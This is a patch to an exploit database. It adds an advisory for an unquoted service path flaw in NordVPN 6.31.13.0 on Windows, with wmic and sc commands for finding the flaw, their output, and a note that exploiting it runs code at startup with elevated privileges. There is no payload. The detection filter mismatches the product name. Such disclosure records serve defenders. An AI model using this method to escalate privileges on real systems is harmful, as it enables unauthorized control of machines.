From e286aad002bbd7f68555b44d6ddaecfbfc05315e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 5 Sep 2020 05:02:01 +0000 Subject: [PATCH] DB: 2020-09-05 1 changes to exploits/shellcodes Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path --- exploits/windows/local/48790.txt | 34 ++++++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 35 insertions(+) create mode 100644 exploits/windows/local/48790.txt diff --git a/exploits/windows/local/48790.txt b/exploits/windows/local/48790.txt new file mode 100644 index 000000000..48965d769 --- /dev/null +++ b/exploits/windows/local/48790.txt @@ -0,0 +1,34 @@ +# Exploit Title: Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path +# Discovery Date: 2020-09-03 +# Discovery by: chipo +# Vendor Homepage: https://nordvpn.com +# Software Link : https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe +# Tested Version: 6.31.13.0 +# Tested on OS: Windows 10 Pro x64 es +# Vulnerability Type: Unquoted Service Path + +# Find the discover Unquoted Service Path Vulnerability: + +C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ovpnconnect" | findstr /i /v """ + +nordvpn-service nordvpn-service C:\Program Files\NordVPN\nordvpn-service.exe + +# Service info: + +C:\>sc qc servicio +[SC] QueryServiceConfig SUCCESS + +NOMBRE_SERVICIO: nordvpn-service + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\NordVPN\nordvpn-service.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : nordvpn-service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +#Exploit: + +A successful attempt to exploit this vulnerability could allow to execute code during startup or reboot with the elevated privileges. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d9bd9c924..4180d01e6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10373,6 +10373,7 @@ id,file,description,date,author,type,platform,port 42718,exploits/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",local,windows, 42735,exploits/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",local,windows, 42777,exploits/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,local,windows, +48790,exploits/windows/local/48790.txt,"Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path",2020-09-04,chipo,local,windows, 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux, 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows, 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,